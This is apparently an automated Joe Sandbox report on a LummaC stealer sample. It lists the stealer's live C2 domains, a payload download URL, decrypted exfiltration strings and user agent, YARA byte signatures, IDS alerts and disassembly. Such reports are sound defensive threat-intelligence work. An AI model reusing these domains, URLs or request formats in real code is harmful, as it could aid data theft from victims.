Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TN78WX7nJU.exe

Overview

General Information

Sample name:TN78WX7nJU.exe
renamed because original name is a hash value
Original sample name:e1c246e51c4460e34a3429a6fc397942.exe
Analysis ID:1575131
MD5:e1c246e51c4460e34a3429a6fc397942
SHA1:48ee7173d3a33be1b81ce82c351b1b35bfcd4aac
SHA256:5b6c7709634f9b0f38fcac6fb91bf82eefda4096935f0a539623df2ec981f5b5
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TN78WX7nJU.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\TN78WX7nJU.exe" MD5: E1C246E51C4460E34A3429A6FC397942)
    • C455.tmp.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\C455.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 7756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1684 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2221850742.0000000000AFA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1058:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1338:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        1.3.C455.tmp.exe.a40000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          1.2.C455.tmp.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            1.2.C455.tmp.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              1.3.C455.tmp.exe.a40000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:54.029381+010020283713Unknown Traffic192.168.2.449732104.21.22.222443TCP
                2024-12-14T14:12:57.535218+010020283713Unknown Traffic192.168.2.449733104.21.96.1443TCP
                2024-12-14T14:13:01.486388+010020283713Unknown Traffic192.168.2.44973523.55.153.106443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:56.157822+010020546531A Network Trojan was detected192.168.2.449732104.21.22.222443TCP
                2024-12-14T14:12:59.016757+010020546531A Network Trojan was detected192.168.2.449733104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:56.157822+010020498361A Network Trojan was detected192.168.2.449732104.21.22.222443TCP
                2024-12-14T14:12:59.016757+010020498361A Network Trojan was detected192.168.2.449733104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:57.535218+010020582151Domain Observed Used for C2 Detected192.168.2.449733104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:54.029381+010020582231Domain Observed Used for C2 Detected192.168.2.449732104.21.22.222443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:59.656713+010020582101Domain Observed Used for C2 Detected192.168.2.4561481.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:56.173425+010020582141Domain Observed Used for C2 Detected192.168.2.4600881.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:59.324973+010020582161Domain Observed Used for C2 Detected192.168.2.4514811.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:59.179780+010020582181Domain Observed Used for C2 Detected192.168.2.4642771.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:59.018983+010020582201Domain Observed Used for C2 Detected192.168.2.4631841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:52.661007+010020582221Domain Observed Used for C2 Detected192.168.2.4529481.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:52.521399+010020582261Domain Observed Used for C2 Detected192.168.2.4526441.1.1.153UDP
                2024-12-14T14:12:59.797862+010020582261Domain Observed Used for C2 Detected192.168.2.4653931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:59.503865+010020582361Domain Observed Used for C2 Detected192.168.2.4639531.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:12:46.131119+010028032742Potentially Bad Traffic192.168.2.449730172.67.179.207443TCP
                2024-12-14T14:12:47.868178+010028032742Potentially Bad Traffic192.168.2.449731176.113.115.1980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-14T14:13:02.327356+010028586661Domain Observed Used for C2 Detected192.168.2.44973523.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: TN78WX7nJU.exeAvira: detected
                Source: https://diffuculttan.xyz/apiAvira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/Avira URL Cloud: Label: malware
                Source: http://176.113.115.19/ScreenUpdateSync.exeAvira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/?Avira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/CAvira URL Cloud: Label: malware
                Source: https://awake-weaves.cyou/apiHAvira URL Cloud: Label: malware
                Source: https://effecterectz.xyz/xAvira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz/#Avira URL Cloud: Label: malware
                Source: https://sordid-snaked.cyou/api~Avira URL Cloud: Label: malware
                Source: https://effecterectz.xyz/4Avira URL Cloud: Label: malware
                Source: https://effecterectz.xyz/Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                Source: 1.3.C455.tmp.exe.a40000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "deafeninggeh.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "4h5VfH--"}
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeReversingLabs: Detection: 42%
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeReversingLabs: Detection: 42%
                Source: TN78WX7nJU.exeVirustotal: Detection: 40%Perma Link
                Source: TN78WX7nJU.exeReversingLabs: Detection: 44%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeJoe Sandbox ML: detected
                Source: TN78WX7nJU.exeJoe Sandbox ML: detected
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

                Compliance

                barindex
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeUnpacked PE file: 0.2.TN78WX7nJU.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeUnpacked PE file: 1.2.C455.tmp.exe.400000.0.unpack
                Source: TN78WX7nJU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h1_2_0043CD60
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, edx1_2_0040BDC9
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp al, 2Eh1_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp eax1_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h1_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h1_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]1_2_0040E83B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h1_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, ecx1_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]1_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp ecx1_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h1_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ecx, di1_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_0043B195
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]1_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh1_2_004369A0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]1_2_0041E9B0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_004299B0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]1_2_0042526A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ebx, edi1_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov esi, eax1_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h1_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]1_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp ecx1_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]1_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [eax], dx1_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0043AAB2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h1_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h1_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov eax, ebx1_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h1_2_0043CB20
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, eax1_2_00427326
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]1_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_0042A3D0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0042C45C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]1_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]1_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]1_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, eax1_2_0042750D
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]1_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]1_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]1_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h1_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0042AE48
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp eax1_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]1_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0042AE24
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00433630
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]1_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h1_2_0043CE90
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004166A0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0042ADF4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov eax, edx1_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp eax1_2_0043BF40
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]1_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h1_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]1_2_0043A777
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]1_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]1_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]1_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]1_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al1_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]1_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]1_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A1B0AF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A1B08B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp eax1_2_00A170E4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h1_2_00A2D0F7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]1_2_00A160F7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, edx1_2_009FC030
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al1_2_00A0E1E7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A1B05B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h1_2_00A2B2C4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_00A2B2C4
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h1_2_00A2B2CF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_00A2B2CF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_009FD25A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]1_2_009FD25A
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp eax1_2_00A2C268
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp al, 2Eh1_2_00A163B6
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_00A2B3FC
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h1_2_00A2B2C2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]1_2_00A2B2C2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]1_2_00A154D1
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ebx, edi1_2_00A0D4D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h1_2_00A155B3
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h1_2_00A1559D
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h1_2_00A1552B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00A0C528
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]1_2_00A06544
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]1_2_00A0554C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h1_2_00A2D557
